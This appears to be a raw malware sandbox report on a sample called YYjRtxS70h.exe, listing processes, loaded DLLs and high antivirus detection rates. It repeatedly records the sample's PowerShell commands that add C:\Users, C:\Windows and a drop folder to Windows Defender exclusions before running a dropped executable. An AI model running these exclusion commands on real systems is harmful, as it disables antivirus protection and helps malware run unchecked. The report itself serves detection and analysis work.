Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1Jump to behavior
Source: YYjRtxS70h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YYjRtxS70h.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\YYjRtxS70h.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: YYjRtxS70h.exeVirustotal: Detection: 62%
Source: YYjRtxS70h.exeReversingLabs: Detection: 65%
Source: unknownProcess created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQoJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
